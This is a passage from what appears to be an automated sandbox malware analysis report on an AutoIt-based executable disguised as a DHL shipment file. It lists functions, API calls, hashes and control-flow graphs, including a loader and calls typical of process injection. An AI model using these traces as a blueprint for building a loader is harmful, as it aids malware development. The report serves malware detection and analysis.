                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$CreateShow
                                                                                    • String ID: AutoIt v3$edit
                                                                                    • API String ID: 1584632944-3779509399
                                                                                    • Opcode ID: 8353997803258652df66131b49d164bc50d62dff465c950592a35e077e6b40ef
                                                                                    • Instruction ID: 13b8b7c18aa4cf8b099b543b65b7e5ec10a560b84aaabf94c749a7b247d9d7f0
                                                                                    • Opcode Fuzzy Hash: 8353997803258652df66131b49d164bc50d62dff465c950592a35e077e6b40ef
                                                                                    • Instruction Fuzzy Hash: 47F03A709102907EEB3057236C0DE2B3E7DF7C6F50F00002ABE08A2276C6A54880EAB0
                                                                                    Function 0149C9E8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 147fileCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1076 149c9e8-149cb1f call 149a638 call 149c8d8 CreateFileW 1083 149cb21 1076->1083 1084 149cb26-149cb36 1076->1084 1085 149cbd6-149cbdb 1083->1085 1087 149cb38 1084->1087 1088 149cb3d-149cb57 VirtualAlloc 1084->1088 1087->1085 1089 149cb59 1088->1089 1090 149cb5b-149cb72 ReadFile 1088->1090 1089->1085 1091 149cb74 1090->1091 1092 149cb76-149cbb0 call 149c918 call 149b8d8 1090->1092 1091->1085 1097 149cbcc-149cbd4 ExitProcess 1092->1097 1098 149cbb2-149cbc7 call 149c968 1092->1098 1097->1085 1098->1097
                                                                                    APIs
                                                                                      • Part of subcall function 0149C8D8: Sleep.KERNELBASE(000001F4), ref: 0149C8E9
                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0149CB15
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053365471.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_149a000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFileSleep
                                                                                    • String ID: Z7E68YZKOM0XAT17Q02
                                                                                    • API String ID: 2694422964-3768408646
                                                                                    • Opcode ID: 37245a4e72cc826cb9209ba088b8d321523112dca6ccb009aa24ad77668258da
                                                                                    • Instruction ID: 3767ddf7d21696bd92e4320c2512a49fdeb07ece71375f1117fe302936572a07
                                                                                    • Opcode Fuzzy Hash: 37245a4e72cc826cb9209ba088b8d321523112dca6ccb009aa24ad77668258da
                                                                                    • Instruction Fuzzy Hash: A6519070D04249EBEF11DBE4D854BEEBBB9AF19300F00459AE608BB2C1D7790B45CBA5
                                                                                    Function 007B407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1100 7b407c-7b4092 1101 7b4098-7b40ad call 7b7a16 1100->1101 1102 7b416f-7b4173 1100->1102 1105 7ed3c8-7ed3d7 LoadStringW 1101->1105 1106 7b40b3-7b40d3 call 7b7bcc 1101->1106 1109 7ed3e2-7ed3fa call 7b7b2e call 7b6fe3 1105->1109 1106->1109 1110 7b40d9-7b40dd 1106->1110 1119 7b40ed-7b416a call 7d2de0 call 7b454e call 7d2dbc Shell_NotifyIconW call 7b5904 1109->1119 1122 7ed400-7ed41e call 7b7cab call 7b6fe3 call 7b7cab 1109->1122 1112 7b40e3-7b40e8 call 7b7b2e 1110->1112 1113 7b4174-7b417d call 7b8047 1110->1113 1112->1119 1113->1119 1119->1102 1122->1119
                                                                                    APIs
                                                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 007ED3D7
                                                                                      • Part of subcall function 007B7BCC: _memmove.LIBCMT ref: 007B7C06
                                                                                    • _memset.LIBCMT ref: 007B40FC
                                                                                    • _wcscpy.LIBCMT ref: 007B4150
                                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007B4160
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                    • String ID: Line:
                                                                                    • API String ID: 3942752672-1585850449
                                                                                    • Opcode ID: 43359506191fdfd9965277030cd5dd8030395980adb66101ebcd8348fbf4f773
                                                                                    • Instruction ID: 2835ce21ab6ca4023752d479502d26695712944e6c760ad947a50b3c64c83705
                                                                                    • Opcode Fuzzy Hash: 43359506191fdfd9965277030cd5dd8030395980adb66101ebcd8348fbf4f773
                                                                                    • Instruction Fuzzy Hash: 4F31A471408705EFD325EB60DC49FDB77E8BF54300F10491EF68992192DBB8A648CB96
                                                                                    Function 007B686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1135 7b686a-7b6891 call 7b4ddd 1138 7b6897-7b68a5 call 7b4ddd 1135->1138 1139 7ee031-7ee041 call 81955b 1135->1139 1138->1139 1144 7b68ab-7b68b1 1138->1144 1143 7ee046-7ee048 1139->1143 1145 7ee04a-7ee04d call 7b4e4a 1143->1145 1146 7ee067-7ee0af call 7d0db6 1143->1146 1148 7ee052-7ee061 call 8142f8 1144->1148 1149 7b68b7-7b68d9 call 7b6a8c 1144->1149 1145->1148 1154 7ee0d4 1146->1154 1155 7ee0b1-7ee0bb 1146->1155 1148->1146 1159 7ee0d6-7ee0e9 1154->1159 1158 7ee0cf-7ee0d0 1155->1158 1160 7ee0bd-7ee0cc 1158->1160 1161 7ee0d2 1158->1161 1162 7ee0ef 1159->1162 1163 7ee260-7ee263 call 7d2d55 1159->1163 1160->1158 1161->1159 1165 7ee0f6-7ee0f9 call 7b7480 1162->1165 1166 7ee268-7ee271 call 7b4e4a 1163->1166 1169 7ee0fe-7ee120 call 7b5db2 call 8173e9 1165->1169 1172 7ee273-7ee283 call 7b7616 call 7b5d9b 1166->1172 1178 7ee134-7ee13e call 8173d3 1169->1178 1179 7ee122-7ee12f 1169->1179 1188 7ee288-7ee2b8 call 80f7a1 call 7d0e2c call 7d2d55 call 7b4e4a 1172->1188 1186 7ee158-7ee162 call 8173bd 1178->1186 1187 7ee140-7ee153 1178->1187 1181 7ee227-7ee237 call 7b750f 1179->1181 1181->1169 1190 7ee23d-7ee247 call 7b735d 1181->1190 1198 7ee176-7ee180 call 7b5e2a 1186->1198 1199 7ee164-7ee171 1186->1199 1187->1181 1188->1172 1197 7ee24c-7ee25a 1190->1197 1197->1163 1197->1165 1198->1181 1205 7ee186-7ee19e call 80f73d 1198->1205 1199->1181 1210 7ee1a0-7ee1bf call 7b7de1 call 7b5904 1205->1210 1211 7ee1c1-7ee1c4 1205->1211 1234 7ee1e2-7ee1f0 call 7b5db2 1210->1234 1213 7ee1c6-7ee1e1 call 7b7de1 call 7b6839 call 7b5904 1211->1213 1214 7ee1f2-7ee1f5 1211->1214 1213->1234 1216 7ee1f7-7ee200 call 80f65e 1214->1216 1217 7ee215-7ee218 call 81737f 1214->1217 1216->1188 1227 7ee206-7ee210 call 7d0e2c 1216->1227 1224 7ee21d-7ee226 call 7d0e2c 1217->1224 1224->1181 1227->1169 1234->1224
                                                                                    APIs
                                                                                      • Part of subcall function 007B4DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,008752F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 007B4E0F
                                                                                    • _free.LIBCMT ref: 007EE263
                                                                                    • _free.LIBCMT ref: 007EE2AA
                                                                                      • Part of subcall function 007B6A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 007B6BAD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$CurrentDirectoryLibraryLoad
                                                                                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                    • API String ID: 2861923089-1757145024
                                                                                    • Opcode ID: d2126beee75f92a029159714f093546408c2d7b8702877a65afe80130453fb3e
                                                                                    • Instruction ID: 2ed3b308155aca56387f46e81b39cc0b3eb04044a9f0a2223e89a9356214022b
                                                                                    • Opcode Fuzzy Hash: d2126beee75f92a029159714f093546408c2d7b8702877a65afe80130453fb3e
                                                                                    • Instruction Fuzzy Hash: 0A918E71901259EFCF04EFA5CC85AEDB7B8FF08310F10482AF915AB2A1DB78A955CB50
                                                                                    Function 007B35B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,007B35A1,SwapMouseButtons,00000004,?), ref: 007B35D4
                                                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,007B35A1,SwapMouseButtons,00000004,?,?,?,?,007B2754), ref: 007B35F5
                                                                                    • RegCloseKey.KERNELBASE(00000000,?,?,007B35A1,SwapMouseButtons,00000004,?,?,?,?,007B2754), ref: 007B3617
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseOpenQueryValue
                                                                                    • String ID: Control Panel\Mouse
                                                                                    • API String ID: 3677997916-824357125
                                                                                    • Opcode ID: e6d945936beb50c1008fa3fe083b1c33348b9fe3779e64988c7fa0604337716d
                                                                                    • Instruction ID: cceca4aa6a8477670060d106561a33d402c6f7ce2dabe183293970aa5e2af4b4
                                                                                    • Opcode Fuzzy Hash: e6d945936beb50c1008fa3fe083b1c33348b9fe3779e64988c7fa0604337716d
                                                                                    • Instruction Fuzzy Hash: D0115AB5910208FFDB208F68DC80EEEB7B8EF44744F005869F905D7210E2759F8097A0
                                                                                    Function 0149B8D8 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 0149C093
                                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0149C129
                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0149C14B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053365471.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_149a000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                    • String ID:
                                                                                    • API String ID: 2438371351-0
                                                                                    • Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                                                    • Instruction ID: 84a7014711e24496d02d7daefa995ba1ceda902593bbfd2899e48d5c95432acf
                                                                                    • Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                                                    • Instruction Fuzzy Hash: CA620C70A14218DBEB24CFA4C851BEEB772EF58700F1091A9D10DEB3A1E7759E81CB59
                                                                                    Function 0081955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 007B4EE5: _fseek.LIBCMT ref: 007B4EFD
                                                                                      • Part of subcall function 00819734: _wcscmp.LIBCMT ref: 00819824
                                                                                      • Part of subcall function 00819734: _wcscmp.LIBCMT ref: 00819837
                                                                                    • _free.LIBCMT ref: 008196A2
                                                                                    • _free.LIBCMT ref: 008196A9
                                                                                    • _free.LIBCMT ref: 00819714
                                                                                      • Part of subcall function 007D2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,007D9A24), ref: 007D2D69
                                                                                      • Part of subcall function 007D2D55: GetLastError.KERNEL32(00000000,?,007D9A24), ref: 007D2D7B
                                                                                    • _free.LIBCMT ref: 0081971C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                    • String ID:
                                                                                    • API String ID: 1552873950-0
                                                                                    • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                                    • Instruction ID: 17aaf03a57c37252e8586a43f8182bb6ed9bdfacb4cf7009aaa3a490368adbc2
                                                                                    • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                                    • Instruction Fuzzy Hash: FF513BB1904218AFDB249F64CC85AEEBBBAFF48300F10449EF249A3341DB755A818F59
                                                                                    Function 007D470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                    • String ID:
                                                                                    • API String ID: 2782032738-0
                                                                                    • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                    • Instruction ID: ed2c802da1192d44e6524126860b37e7d472d83b40a6481e30056a051fb6276c
                                                                                    • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                    • Instruction Fuzzy Hash: F441B375A00746ABDF188E69C8849AE7BB6EF453A0B24813FE81987740EB78DD409B50
                                                                                    Function 007B44A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 007B44CF
                                                                                      • Part of subcall function 007B407C: _memset.LIBCMT ref: 007B40FC
                                                                                      • Part of subcall function 007B407C: _wcscpy.LIBCMT ref: 007B4150
                                                                                      • Part of subcall function 007B407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007B4160
                                                                                    • KillTimer.USER32(?,00000001,?,?), ref: 007B4524
                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 007B4533
                                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007ED4B9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                    • String ID:
                                                                                    • API String ID: 1378193009-0
                                                                                    • Opcode ID: e92da53a10fc4e5ad68033ac574dbe28e8ee55f9b1e3a35dcf9c575e55cbd184
                                                                                    • Instruction ID: 88998f7880d2fbbe6baa2de94640cd70cf8fb1b4877a8520131d3eeea2663a02
                                                                                    • Opcode Fuzzy Hash: e92da53a10fc4e5ad68033ac574dbe28e8ee55f9b1e3a35dcf9c575e55cbd184
                                                                                    • Instruction Fuzzy Hash: 9621D7709057C4AFE7329B248859BE6BBECAF16314F04049DE79E56183C3786D84CB51
                                                                                    Function 007B7285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 007EEA39
                                                                                    • GetOpenFileNameW.COMDLG32(?), ref: 007EEA83
                                                                                      • Part of subcall function 007B4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007B4743,?,?,007B37AE,?), ref: 007B4770
                                                                                      • Part of subcall function 007D0791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007D07B0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Name$Path$FileFullLongOpen_memset
                                                                                    • String ID: X
                                                                                    • API String ID: 3777226403-3081909835
                                                                                    • Opcode ID: 9ec0850537f27cdd664cf64a5321ec00e0f859473be61c2b3844fb87487da93c
                                                                                    • Instruction ID: c810e1f926fa8989a4300c905cbb2d1d5d83db1e529c3183a87dfe0c71ba9633
                                                                                    • Opcode Fuzzy Hash: 9ec0850537f27cdd664cf64a5321ec00e0f859473be61c2b3844fb87487da93c
                                                                                    • Instruction Fuzzy Hash: 37219371A10288DBCF459FD4D849BEE7BF9AF49714F00405AE508EB342DBB85989CFA1
                                                                                    Function 008198E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 008198F8
                                                                                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0081990F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Temp$FileNamePath
                                                                                    • String ID: aut
                                                                                    • API String ID: 3285503233-3010740371
                                                                                    • Opcode ID: 774e9bd1813f2b48143140741f115e222897bfa72bc6058ac0fa9bec7cdceffa
                                                                                    • Instruction ID: 0dcf4b0c3a840ba387067e854d36cc80d225ab7f43ed91cf8416ad459f3893a6
                                                                                    • Opcode Fuzzy Hash: 774e9bd1813f2b48143140741f115e222897bfa72bc6058ac0fa9bec7cdceffa
                                                                                    • Instruction Fuzzy Hash: 96D05E7994030DEBDB609BA0DC0EF9BB73CF744700F0006B1BB58D21A2EAB095988BD1
                                                                                    Function 0082CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4ce9777ab0baf048678a5b6e8d6fba2f11123310c94275f87b23276cfe6b3ead
                                                                                    • Instruction ID: 51107fba45b8326dae5f774ec95ae67e2a9d4fd286b1bcb955539e3eca2e6a73
                                                                                    • Opcode Fuzzy Hash: 4ce9777ab0baf048678a5b6e8d6fba2f11123310c94275f87b23276cfe6b3ead
                                                                                    • Instruction Fuzzy Hash: 4AF146706083109FCB14DF28D484A6EBBE5FF89314F14892EF9999B251DB74E985CF82
                                                                                    Function 007BF76F Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 007D0162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 007D0193
                                                                                      • Part of subcall function 007D0162: MapVirtualKeyW.USER32(00000010,00000000), ref: 007D019B
                                                                                      • Part of subcall function 007D0162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 007D01A6
                                                                                      • Part of subcall function 007D0162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 007D01B1
                                                                                      • Part of subcall function 007D0162: MapVirtualKeyW.USER32(00000011,00000000), ref: 007D01B9
                                                                                      • Part of subcall function 007D0162: MapVirtualKeyW.USER32(00000012,00000000), ref: 007D01C1
                                                                                      • Part of subcall function 007C60F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,007BF930), ref: 007C6154
                                                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 007BF9CD
                                                                                    • OleInitialize.OLE32(00000000), ref: 007BFA4A
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 007F45C8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                    • String ID:
                                                                                    • API String ID: 1986988660-0
                                                                                    • Opcode ID: c59005978968caab23e06ee9c44ac227d77174801ef41f326dc402604f35886d
                                                                                    • Instruction ID: 47f3078e3931a5972a86af1376263dfc680ba583264c78eac00f6f9ea190e857
                                                                                    • Opcode Fuzzy Hash: c59005978968caab23e06ee9c44ac227d77174801ef41f326dc402604f35886d
                                                                                    • Instruction Fuzzy Hash: 5A81CAF0901A40CED398DF69A84D6587BE5FB99306B50852AD11CCB37AE7F4C4C88F58
                                                                                    Function 007B434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 007B4370
                                                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 007B4415
                                                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 007B4432
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
